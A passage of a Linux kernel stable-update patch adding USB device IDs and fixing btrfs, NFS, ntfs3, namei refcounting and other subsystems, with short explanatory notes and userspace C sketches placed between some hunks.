++	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0608) }, /* Genesys Logic GL850G USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0610) }, /* Genesys Logic GL852G USB 2.0 */
++	{ USB_DEVICE(VENDOR_ID_GENESYS, 0x0620) }, /* Genesys Logic GL3523 USB 3.1 */
++	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2412) }, /* USB2412 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2514) }, /* USB2514B USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_MICROCHIP, 0x2517) }, /* USB2517 USB 2.0 */
+ 	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x0411) }, /* RTS5411 USB 3.1 */
+diff --git a/drivers/usb/misc/onboard_usb_hub.h b/drivers/usb/misc/onboard_usb_hub.h
+index 2cde54b69eede..d023fb90b4118 100644
+--- a/drivers/usb/misc/onboard_usb_hub.h
++++ b/drivers/usb/misc/onboard_usb_hub.h
+@@ -22,11 +22,23 @@ static const struct onboard_hub_pdata ti_tusb8041_data = {
+ 	.reset_us = 3000,
+ };
+ 
++static const struct onboard_hub_pdata genesys_gl850g_data = {
++	.reset_us = 3,
++};
++
++static const struct onboard_hub_pdata genesys_gl852g_data = {
++	.reset_us = 50,
++};
++
+ static const struct of_device_id onboard_hub_match[] = {
++	{ .compatible = "usb424,2412", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb424,2514", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb424,2517", .data = &microchip_usb424_data, },
+ 	{ .compatible = "usb451,8140", .data = &ti_tusb8041_data, },
+ 	{ .compatible = "usb451,8142", .data = &ti_tusb8041_data, },
++	{ .compatible = "usb5e3,608", .data = &genesys_gl850g_data, },
++	{ .compatible = "usb5e3,610", .data = &genesys_gl852g_data, },
++	{ .compatible = "usb5e3,620", .data = &genesys_gl852g_data, },
+ 	{ .compatible = "usbbda,411", .data = &realtek_rts5411_data, },
+ 	{ .compatible = "usbbda,5411", .data = &realtek_rts5411_data, },
+ 	{ .compatible = "usbbda,414", .data = &realtek_rts5411_data, },
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index f13930b4534c1..b9dd714a3ae69 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -203,6 +203,9 @@ static void option_instat_callback(struct urb *urb);
+ #define DELL_PRODUCT_5829E_ESIM			0x81e4
+ #define DELL_PRODUCT_5829E			0x81e6
+ 
++#define DELL_PRODUCT_FM101R			0x8213
++#define DELL_PRODUCT_FM101R_ESIM		0x8215
++
+ #define KYOCERA_VENDOR_ID			0x0c88
+ #define KYOCERA_PRODUCT_KPC650			0x17da
+ #define KYOCERA_PRODUCT_KPC680			0x180a
+@@ -1108,6 +1111,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(0) | RSVD(6) },
+ 	{ USB_DEVICE(DELL_VENDOR_ID, DELL_PRODUCT_5829E_ESIM),
+ 	  .driver_info = RSVD(0) | RSVD(6) },
++	{ USB_DEVICE_INTERFACE_CLASS(DELL_VENDOR_ID, DELL_PRODUCT_FM101R, 0xff) },
++	{ USB_DEVICE_INTERFACE_CLASS(DELL_VENDOR_ID, DELL_PRODUCT_FM101R_ESIM, 0xff) },
+ 	{ USB_DEVICE(ANYDATA_VENDOR_ID, ANYDATA_PRODUCT_ADU_E100A) },	/* ADU-E100, ADU-310 */
+ 	{ USB_DEVICE(ANYDATA_VENDOR_ID, ANYDATA_PRODUCT_ADU_500A) },
+ 	{ USB_DEVICE(ANYDATA_VENDOR_ID, ANYDATA_PRODUCT_ADU_620UW) },
+@@ -1290,6 +1295,7 @@ static const struct usb_device_id option_ids[] = {
+ 	 .driver_info = NCTRL(0) | RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1033, 0xff),	/* Telit LE910C1-EUX (ECM) */
+ 	 .driver_info = NCTRL(0) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1035, 0xff) }, /* Telit LE910C4-WWX (ECM) */
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_LE922_USBCFG0),
+ 	  .driver_info = RSVD(0) | RSVD(1) | NCTRL(2) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_LE922_USBCFG1),
+@@ -2262,6 +2268,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1406, 0xff) },			/* GosunCn GM500 ECM/NCM */
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index 1a327eb3580b4..e08688844f1e1 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -563,18 +563,30 @@ noinline int btrfs_cow_block(struct btrfs_trans_handle *trans,
+ 	u64 search_start;
+ 	int ret;
+ 
+-	if (test_bit(BTRFS_ROOT_DELETING, &root->state))
+-		btrfs_err(fs_info,
+-			"COW'ing blocks on a fs root that's being dropped");
+-
+-	if (trans->transaction != fs_info->running_transaction)
+-		WARN(1, KERN_CRIT "trans %llu running %llu\n",
+-		       trans->transid,
+-		       fs_info->running_transaction->transid);
++	if (unlikely(test_bit(BTRFS_ROOT_DELETING, &root->state))) {
++		btrfs_abort_transaction(trans, -EUCLEAN);
++		btrfs_crit(fs_info,
++		   "attempt to COW block %llu on root %llu that is being deleted",
++			   buf->start, btrfs_root_id(root));
++		return -EUCLEAN;
++	}
+ 
+-	if (trans->transid != fs_info->generation)
+-		WARN(1, KERN_CRIT "trans %llu running %llu\n",
+-		       trans->transid, fs_info->generation);
++	/*
++	 * COWing must happen through a running transaction, which always
++	 * matches the current fs generation (it's a transaction with a state
++	 * less than TRANS_STATE_UNBLOCKED). If it doesn't, then turn the fs
++	 * into error state to prevent the commit of any transaction.
++	 */
++	if (unlikely(trans->transaction != fs_info->running_transaction ||
++		     trans->transid != fs_info->generation)) {
++		btrfs_abort_transaction(trans, -EUCLEAN);
++		btrfs_crit(fs_info,
++"unexpected transaction when attempting to COW block %llu on root %llu, transaction %llu running transaction %llu fs generation %llu",
++			   buf->start, btrfs_root_id(root), trans->transid,
++			   fs_info->running_transaction->transid,
++			   fs_info->generation);
++		return -EUCLEAN;
++	}
+ 
+ 	if (!should_cow_block(trans, root, buf)) {
+ 		*cow_ret = buf;
+@@ -686,8 +698,22 @@ int btrfs_realloc_node(struct btrfs_trans_handle *trans,
+ 	int progress_passed = 0;
+ 	struct btrfs_disk_key disk_key;
+ 
+-	WARN_ON(trans->transaction != fs_info->running_transaction);
+-	WARN_ON(trans->transid != fs_info->generation);
++	/*
++	 * COWing must happen through a running transaction, which always
++	 * matches the current fs generation (it's a transaction with a state
++	 * less than TRANS_STATE_UNBLOCKED). If it doesn't, then turn the fs
++	 * into error state to prevent the commit of any transaction.
++	 */
++	if (unlikely(trans->transaction != fs_info->running_transaction ||
++		     trans->transid != fs_info->generation)) {
++		btrfs_abort_transaction(trans, -EUCLEAN);
++		btrfs_crit(fs_info,
++"unexpected transaction when attempting to reallocate parent %llu for root %llu, transaction %llu running transaction %llu fs generation %llu",
++			   parent->start, btrfs_root_id(root), trans->transid,
++			   fs_info->running_transaction->transid,
++			   fs_info->generation);
++		return -EUCLEAN;
++	}
+ 
+ 	parent_nritems = btrfs_header_nritems(parent);
+ 	blocksize = fs_info->nodesize;
+diff --git a/fs/btrfs/delayed-ref.c b/fs/btrfs/delayed-ref.c
+index 36a3debe94930..e08e3852c4788 100644
+--- a/fs/btrfs/delayed-ref.c
++++ b/fs/btrfs/delayed-ref.c
+@@ -141,24 +141,17 @@ void btrfs_update_delayed_refs_rsv(struct btrfs_trans_handle *trans)
+  * Transfer bytes to our delayed refs rsv
+  *
+  * @fs_info:   the filesystem
+- * @src:       source block rsv to transfer from
+  * @num_bytes: number of bytes to transfer
+  *
+- * This transfers up to the num_bytes amount from the src rsv to the
++ * This transfers up to the num_bytes amount, previously reserved, to the
+  * delayed_refs_rsv.  Any extra bytes are returned to the space info.
+  */
+ void btrfs_migrate_to_delayed_refs_rsv(struct btrfs_fs_info *fs_info,
+-				       struct btrfs_block_rsv *src,
+ 				       u64 num_bytes)
+ {
+ 	struct btrfs_block_rsv *delayed_refs_rsv = &fs_info->delayed_refs_rsv;
+ 	u64 to_free = 0;
+ 
+-	spin_lock(&src->lock);
+-	src->reserved -= num_bytes;
+-	src->size -= num_bytes;
+-	spin_unlock(&src->lock);
+-
+ 	spin_lock(&delayed_refs_rsv->lock);
+ 	if (delayed_refs_rsv->size > delayed_refs_rsv->reserved) {
+ 		u64 delta = delayed_refs_rsv->size -
+diff --git a/fs/btrfs/delayed-ref.h b/fs/btrfs/delayed-ref.h
+index d6304b690ec4a..712a6315e956b 100644
+--- a/fs/btrfs/delayed-ref.h
++++ b/fs/btrfs/delayed-ref.h
+@@ -383,7 +383,6 @@ void btrfs_update_delayed_refs_rsv(struct btrfs_trans_handle *trans);
+ int btrfs_delayed_refs_rsv_refill(struct btrfs_fs_info *fs_info,
+ 				  enum btrfs_reserve_flush_enum flush);
+ void btrfs_migrate_to_delayed_refs_rsv(struct btrfs_fs_info *fs_info,
+-				       struct btrfs_block_rsv *src,
+ 				       u64 num_bytes);
+ int btrfs_should_throttle_delayed_refs(struct btrfs_trans_handle *trans);
+ bool btrfs_check_space_for_delayed_refs(struct btrfs_fs_info *fs_info);
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 08ff10a81cb90..2a7c9088fe1f8 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -1663,12 +1663,12 @@ static int run_delayed_tree_ref(struct btrfs_trans_handle *trans,
+ 		parent = ref->parent;
+ 	ref_root = ref->root;
+ 
+-	if (node->ref_mod != 1) {
++	if (unlikely(node->ref_mod != 1)) {
+ 		btrfs_err(trans->fs_info,
+-	"btree block(%llu) has %d references rather than 1: action %d ref_root %llu parent %llu",
++	"btree block %llu has %d references rather than 1: action %d ref_root %llu parent %llu",
+ 			  node->bytenr, node->ref_mod, node->action, ref_root,
+ 			  parent);
+-		return -EIO;
++		return -EUCLEAN;
+ 	}
+ 	if (node->action == BTRFS_ADD_DELAYED_REF && insert_reserved) {
+ 		BUG_ON(!extent_op || !extent_op->update_flags);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 9e323420c96d3..9474265ee7ea3 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3869,7 +3869,7 @@ static void get_block_group_info(struct list_head *groups_list,
+ static long btrfs_ioctl_space_info(struct btrfs_fs_info *fs_info,
+ 				   void __user *arg)
+ {
+-	struct btrfs_ioctl_space_args space_args;
++	struct btrfs_ioctl_space_args space_args = { 0 };
+ 	struct btrfs_ioctl_space_info space;
+ 	struct btrfs_ioctl_space_info *dest;
+ 	struct btrfs_ioctl_space_info *dest_orig;
+@@ -5223,7 +5223,7 @@ static int _btrfs_ioctl_send(struct inode *inode, void __user *argp, bool compat
+ 
+ 	if (compat) {
+ #if defined(CONFIG_64BIT) && defined(CONFIG_COMPAT)
+-		struct btrfs_ioctl_send_args_32 args32;
++		struct btrfs_ioctl_send_args_32 args32 = { 0 };
+ 
+ 		ret = copy_from_user(&args32, argp, sizeof(args32));
+ 		if (ret)
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 1193214ba8c10..60db4c3b82fa1 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -614,14 +614,14 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 			reloc_reserved = true;
+ 		}
+ 
+-		ret = btrfs_block_rsv_add(fs_info, rsv, num_bytes, flush);
++		ret = btrfs_reserve_metadata_bytes(fs_info, rsv, num_bytes, flush);
+ 		if (ret)
+ 			goto reserve_fail;
+ 		if (delayed_refs_bytes) {
+-			btrfs_migrate_to_delayed_refs_rsv(fs_info, rsv,
+-							  delayed_refs_bytes);
++			btrfs_migrate_to_delayed_refs_rsv(fs_info, delayed_refs_bytes);
+ 			num_bytes -= delayed_refs_bytes;
+ 		}
++		btrfs_block_rsv_add_bytes(rsv, num_bytes, true);
+ 
+ 		if (rsv->space_info->force_alloc)
+ 			do_chunk_alloc = true;
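The reordering above reserves the full amount once and then splits it between the two rsvs, instead of reserving everything into the transaction rsv and moving bytes back out of it afterwards. A rough userspace sketch of the reserve-then-split flow, with hypothetical types:

struct rsv { unsigned long long reserved, size; };

static void split_reservation(struct rsv *trans_rsv, struct rsv *delayed_rsv,
			      unsigned long long num_bytes,
			      unsigned long long delayed_refs_bytes)
{
	/* One reservation is taken up front for the full amount ... */
	if (delayed_refs_bytes) {
		/* ... then the delayed-refs share is carved off ... */
		delayed_rsv->reserved += delayed_refs_bytes;
		num_bytes -= delayed_refs_bytes;
	}
	/* ... and only the remainder is accounted to the transaction rsv. */
	trans_rsv->reserved += num_bytes;
	trans_rsv->size += num_bytes;
}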
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index c03ff6a5a7f6b..7c33b28c02aeb 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -4767,7 +4767,7 @@ static int btrfs_log_prealloc_extents(struct btrfs_trans_handle *trans,
+ 	struct extent_buffer *leaf;
+ 	int slot;
+ 	int ins_nr = 0;
+-	int start_slot;
++	int start_slot = 0;
+ 	int ret;
+ 
+ 	if (!(inode->flags & BTRFS_INODE_PREALLOC))
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index a40ebd2321d01..e62b4c139a72d 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -5139,7 +5139,7 @@ static void init_alloc_chunk_ctl_policy_regular(
+ 	ASSERT(space_info);
+ 
+ 	ctl->max_chunk_size = READ_ONCE(space_info->chunk_size);
+-	ctl->max_stripe_size = ctl->max_chunk_size;
++	ctl->max_stripe_size = min_t(u64, ctl->max_chunk_size, SZ_1G);
+ 
+ 	if (ctl->type & BTRFS_BLOCK_GROUP_SYSTEM)
+ 		ctl->devs_max = min_t(int, ctl->devs_max, BTRFS_MAX_DEVS_SYS_CHUNK);
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index d387708977a50..a5c31a479aacc 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -1522,10 +1522,15 @@ static void requeue_inode(struct inode *inode, struct bdi_writeback *wb,
+ 
+ 	if (wbc->pages_skipped) {
+ 		/*
+-		 * writeback is not making progress due to locked
+-		 * buffers. Skip this inode for now.
++		 * Writeback is not making progress due to locked buffers.
++		 * Skip this inode for now. Although having skipped pages
++		 * is odd for clean inodes, it can happen for some
++		 * filesystems, so handle that gracefully.
+ 		 */
+-		redirty_tail_locked(inode, wb);
++		if (inode->i_state & I_DIRTY_ALL)
++			redirty_tail_locked(inode, wb);
++		else
++			inode_cgwb_move_to_attached(inode, wb);
+ 		return;
+ 	}
+ 
+diff --git a/fs/namei.c b/fs/namei.c
+index 4248647f1ab24..5e1c2ab2ae709 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -187,7 +187,7 @@ getname_flags(const char __user *filename, int flags, int *empty)
+ 		}
+ 	}
+ 
+-	result->refcnt = 1;
++	atomic_set(&result->refcnt, 1);
+ 	/* The empty path is special. */
+ 	if (unlikely(!len)) {
+ 		if (empty)
+@@ -248,7 +248,7 @@ getname_kernel(const char * filename)
+ 	memcpy((char *)result->name, filename, len);
+ 	result->uptr = NULL;
+ 	result->aname = NULL;
+-	result->refcnt = 1;
++	atomic_set(&result->refcnt, 1);
+ 	audit_getname(result);
+ 
+ 	return result;
+@@ -259,9 +259,10 @@ void putname(struct filename *name)
+ 	if (IS_ERR(name))
+ 		return;
+ 
+-	BUG_ON(name->refcnt <= 0);
++	if (WARN_ON_ONCE(!atomic_read(&name->refcnt)))
++		return;
+ 
+-	if (--name->refcnt > 0)
++	if (!atomic_dec_and_test(&name->refcnt))
+ 		return;
+ 
+ 	if (name->name != name->iname) {
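The refcnt conversion above replaces a plain integer (safe only under external locking) with an atomic counter, and the fatal BUG_ON() with a recoverable WARN_ON_ONCE(). A userspace model of the same get/put pattern using C11 atomics rather than the kernel's atomic_t:

#include <stdatomic.h>
#include <stdbool.h>

struct name_ref { atomic_int refcnt; };

static void name_get(struct name_ref *n)
{
	atomic_fetch_add(&n->refcnt, 1);
}

/* Returns true when the caller dropped the last reference and must free. */
static bool name_put(struct name_ref *n)
{
	return atomic_fetch_sub(&n->refcnt, 1) == 1;
}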
+diff --git a/fs/nfs/flexfilelayout/flexfilelayout.c b/fs/nfs/flexfilelayout/flexfilelayout.c
+index 5c69a6e9ab3e1..81bbafab18a99 100644
+--- a/fs/nfs/flexfilelayout/flexfilelayout.c
++++ b/fs/nfs/flexfilelayout/flexfilelayout.c
+@@ -2520,9 +2520,9 @@ ff_layout_mirror_prepare_stats(struct pnfs_layout_hdr *lo,
+ 	return i;
+ }
+ 
+-static int
+-ff_layout_prepare_layoutstats(struct nfs42_layoutstat_args *args)
++static int ff_layout_prepare_layoutstats(struct nfs42_layoutstat_args *args)
+ {
++	struct pnfs_layout_hdr *lo;
+ 	struct nfs4_flexfile_layout *ff_layout;
+ 	const int dev_count = PNFS_LAYOUTSTATS_MAXDEV;
+ 
+@@ -2533,11 +2533,14 @@ ff_layout_prepare_layoutstats(struct nfs42_layoutstat_args *args)
+ 		return -ENOMEM;
+ 
+ 	spin_lock(&args->inode->i_lock);
+-	ff_layout = FF_LAYOUT_FROM_HDR(NFS_I(args->inode)->layout);
+-	args->num_dev = ff_layout_mirror_prepare_stats(&ff_layout->generic_hdr,
+-						       &args->devinfo[0],
+-						       dev_count,
+-						       NFS4_FF_OP_LAYOUTSTATS);
++	lo = NFS_I(args->inode)->layout;
++	if (lo && pnfs_layout_is_valid(lo)) {
++		ff_layout = FF_LAYOUT_FROM_HDR(lo);
++		args->num_dev = ff_layout_mirror_prepare_stats(
++			&ff_layout->generic_hdr, &args->devinfo[0], dev_count,
++			NFS4_FF_OP_LAYOUTSTATS);
++	} else
++		args->num_dev = 0;
+ 	spin_unlock(&args->inode->i_lock);
+ 	if (!args->num_dev) {
+ 		kfree(args->devinfo);
+diff --git a/fs/nfs/nfs42proc.c b/fs/nfs/nfs42proc.c
+index d903ea10410c2..5a8fe0e57a3d3 100644
+--- a/fs/nfs/nfs42proc.c
++++ b/fs/nfs/nfs42proc.c
+@@ -81,7 +81,8 @@ static int _nfs42_proc_fallocate(struct rpc_message *msg, struct file *filep,
+ 	if (status == 0) {
+ 		if (nfs_should_remove_suid(inode)) {
+ 			spin_lock(&inode->i_lock);
+-			nfs_set_cache_invalid(inode, NFS_INO_INVALID_MODE);
++			nfs_set_cache_invalid(inode,
++				NFS_INO_REVAL_FORCED | NFS_INO_INVALID_MODE);
+ 			spin_unlock(&inode->i_lock);
+ 		}
+ 		status = nfs_post_op_update_inode_force_wcc(inode,
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index e1297c6bcfbe2..5cf53def987e5 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -8875,8 +8875,6 @@ static int _nfs4_proc_exchange_id(struct nfs_client *clp, const struct cred *cre
+ 	/* Save the EXCHANGE_ID verifier session trunk tests */
+ 	memcpy(clp->cl_confirm.data, argp->verifier.data,
+ 	       sizeof(clp->cl_confirm.data));
+-	if (resp->flags & EXCHGID4_FLAG_USE_PNFS_DS)
+-		set_bit(NFS_CS_DS, &clp->cl_flags);
+ out:
+ 	trace_nfs4_exchange_id(clp, status);
+ 	rpc_put_task(task);
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index a5db5158c6345..1ffb1068216b6 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -2634,31 +2634,44 @@ pnfs_should_return_unused_layout(struct pnfs_layout_hdr *lo,
+ 	return mode == 0;
+ }
+ 
+-static int
+-pnfs_layout_return_unused_byserver(struct nfs_server *server, void *data)
++static int pnfs_layout_return_unused_byserver(struct nfs_server *server,
++					      void *data)
+ {
+ 	const struct pnfs_layout_range *range = data;
++	const struct cred *cred;
+ 	struct pnfs_layout_hdr *lo;
+ 	struct inode *inode;
++	nfs4_stateid stateid;
++	enum pnfs_iomode iomode;
++
+ restart:
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(lo, &server->layouts, plh_layouts) {
+-		if (!pnfs_layout_can_be_returned(lo) ||
++		inode = lo->plh_inode;
++		if (!inode || !pnfs_layout_can_be_returned(lo) ||
+ 		    test_bit(NFS_LAYOUT_RETURN_REQUESTED, &lo->plh_flags))
+ 			continue;
+-		inode = lo->plh_inode;
+ 		spin_lock(&inode->i_lock);
+-		if (!pnfs_should_return_unused_layout(lo, range)) {
++		if (!lo->plh_inode ||
++		    !pnfs_should_return_unused_layout(lo, range)) {
+ 			spin_unlock(&inode->i_lock);
+ 			continue;
+ 		}
++		pnfs_get_layout_hdr(lo);
++		pnfs_set_plh_return_info(lo, range->iomode, 0);
++		if (pnfs_mark_matching_lsegs_return(lo, &lo->plh_return_segs,
++						    range, 0) != 0 ||
++		    !pnfs_prepare_layoutreturn(lo, &stateid, &cred, &iomode)) {
++			spin_unlock(&inode->i_lock);
++			rcu_read_unlock();
++			pnfs_put_layout_hdr(lo);
++			cond_resched();
++			goto restart;
++		}
+ 		spin_unlock(&inode->i_lock);
+-		inode = pnfs_grab_inode_layout_hdr(lo);
+-		if (!inode)
+-			continue;
+ 		rcu_read_unlock();
+-		pnfs_mark_layout_for_return(inode, range);
+-		iput(inode);
++		pnfs_send_layoutreturn(lo, &stateid, &cred, iomode, false);
++		pnfs_put_layout_hdr(lo);
+ 		cond_resched();
+ 		goto restart;
+ 	}
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 829b62d3bb889..9c0fc3a29d0c9 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -2428,10 +2428,12 @@ void mark_as_free_ex(struct ntfs_sb_info *sbi, CLST lcn, CLST len, bool trim)
+ {
+ 	CLST end, i, zone_len, zlen;
+ 	struct wnd_bitmap *wnd = &sbi->used.bitmap;
++	bool dirty = false;
+ 
+ 	down_write_nested(&wnd->rw_lock, BITMAP_MUTEX_CLUSTERS);
+ 	if (!wnd_is_used(wnd, lcn, len)) {
+-		ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
++		/* Mark the volume as dirty outside of wnd->rw_lock. */
++		dirty = true;
+ 
+ 		end = lcn + len;
+ 		len = 0;
+@@ -2485,6 +2487,8 @@ void mark_as_free_ex(struct ntfs_sb_info *sbi, CLST lcn, CLST len, bool trim)
+ 
+ out:
+ 	up_write(&wnd->rw_lock);
++	if (dirty)
++		ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
+ }
+ 
+ /*
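The mark_as_free_ex() change above records the inconsistency under wnd->rw_lock but only calls ntfs_set_state() after the lock is released, avoiding taking further locks while the bitmap lock is held. A small pthread sketch of the defer-until-unlock pattern; the helper names here are made up:

#include <pthread.h>
#include <stdbool.h>

static pthread_rwlock_t bitmap_lock = PTHREAD_RWLOCK_INITIALIZER;

static void mark_volume_dirty(void)
{
	/* In the kernel this would take other locks of its own. */
}

static void free_clusters(bool range_inconsistent)
{
	bool dirty = false;

	pthread_rwlock_wrlock(&bitmap_lock);
	if (range_inconsistent)
		dirty = true;	/* record the problem, act on it later */
	pthread_rwlock_unlock(&bitmap_lock);

	if (dirty)
		mark_volume_dirty();	/* safe: bitmap_lock is no longer held */
}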
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 495cfb37962fa..b89a33f5761ef 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -729,6 +729,9 @@ static struct NTFS_DE *hdr_find_e(const struct ntfs_index *indx,
+ 	u32 total = le32_to_cpu(hdr->total);
+ 	u16 offs[128];
+ 
++	if (unlikely(!cmp))
++		return NULL;
++
+ fill_table:
+ 	if (end > total)
+ 		return NULL;
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index f5d3092f478c5..df15e00c2a3a0 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -209,7 +209,8 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	size = le32_to_cpu(info->size);
+ 
+ 	/* Enumerate all xattrs. */
+-	for (ret = 0, off = 0; off < size; off += ea_size) {
++	ret = 0;
++	for (off = 0; off + sizeof(struct EA_FULL) < size; off += ea_size) {
+ 		ea = Add2Ptr(ea_all, off);
+ 		ea_size = unpacked_ea_size(ea);
+ 
+@@ -217,6 +218,10 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 			break;
+ 
+ 		if (buffer) {
++			/* Check if we can use field ea->name */
++			if (off + ea_size > size)
++				break;
++
+ 			if (ret + ea->name_len + 1 > bytes_per_buffer) {
+ 				err = -ERANGE;
+ 				goto out;
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index e6d711f42607b..86d4b6975dbcb 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -300,7 +300,7 @@ static int ovl_set_timestamps(struct ovl_fs *ofs, struct dentry *upperdentry,
+ {
+ 	struct iattr attr = {
+ 		.ia_valid =
+-		     ATTR_ATIME | ATTR_MTIME | ATTR_ATIME_SET | ATTR_MTIME_SET,
++		     ATTR_ATIME | ATTR_MTIME | ATTR_ATIME_SET | ATTR_MTIME_SET | ATTR_CTIME,
+ 		.ia_atime = stat->atime,
+ 		.ia_mtime = stat->mtime,
+ 	};
+diff --git a/include/linux/fprobe.h b/include/linux/fprobe.h
+index 1c2bde0ead736..678f741a7b330 100644
+--- a/include/linux/fprobe.h
++++ b/include/linux/fprobe.h
+@@ -13,6 +13,8 @@
+  * @nmissed: The counter for missing events.
+  * @flags: The status flag.
+  * @rethook: The rethook data structure. (internal data)
++ * @entry_data_size: The private data storage size.
++ * @nr_maxactive: The max number of active functions.
+  * @entry_handler: The callback function for function entry.
+  * @exit_handler: The callback function for function exit.
+  */
+@@ -29,9 +31,13 @@ struct fprobe {
+ 	unsigned long		nmissed;
+ 	unsigned int		flags;
+ 	struct rethook		*rethook;
++	size_t			entry_data_size;
++	int			nr_maxactive;
+ 
+-	void (*entry_handler)(struct fprobe *fp, unsigned long entry_ip, struct pt_regs *regs);
+-	void (*exit_handler)(struct fprobe *fp, unsigned long entry_ip, struct pt_regs *regs);
++	void (*entry_handler)(struct fprobe *fp, unsigned long entry_ip,
++			      struct pt_regs *regs, void *entry_data);
++	void (*exit_handler)(struct fprobe *fp, unsigned long entry_ip,
++			     struct pt_regs *regs, void *entry_data);
+ };
+ 
+ /* This fprobe is soft-disabled. */
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 26ea1a0a59a10..dc745317e1bdb 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2735,7 +2735,7 @@ struct audit_names;
+ struct filename {
+ 	const char		*name;	/* pointer to actual string */
+ 	const __user char	*uptr;	/* original userland pointer */
+-	int			refcnt;
++	atomic_t		refcnt;
+ 	struct audit_names	*aname;
+ 	const char		iname[];
+ };
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 784dd6b6046eb..58f5ab29c11a7 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -312,6 +312,7 @@ struct hid_item {
+ #define HID_DG_LATENCYMODE	0x000d0060
+ 
+ #define HID_BAT_ABSOLUTESTATEOFCHARGE	0x00850065
++#define HID_BAT_CHARGING		0x00850044
+ 
+ #define HID_VD_ASUS_CUSTOM_MEDIA_KEYS	0xff310076
+ 
+@@ -612,6 +613,7 @@ struct hid_device {							/* device report descriptor */
+ 	__s32 battery_max;
+ 	__s32 battery_report_type;
+ 	__s32 battery_report_id;
++	__s32 battery_charge_status;
+ 	enum hid_battery_status battery_status;
+ 	bool battery_avoid_query;
+ 	ktime_t battery_ratelimit_time;
+diff --git a/include/linux/iio/iio.h b/include/linux/iio/iio.h
+index f0ec8a5e5a7a9..9d3bd6379eb87 100644
+--- a/include/linux/iio/iio.h
++++ b/include/linux/iio/iio.h
+@@ -629,6 +629,8 @@ int __devm_iio_device_register(struct device *dev, struct iio_dev *indio_dev,
+ int iio_push_event(struct iio_dev *indio_dev, u64 ev_code, s64 timestamp);
+ int iio_device_claim_direct_mode(struct iio_dev *indio_dev);
+ void iio_device_release_direct_mode(struct iio_dev *indio_dev);
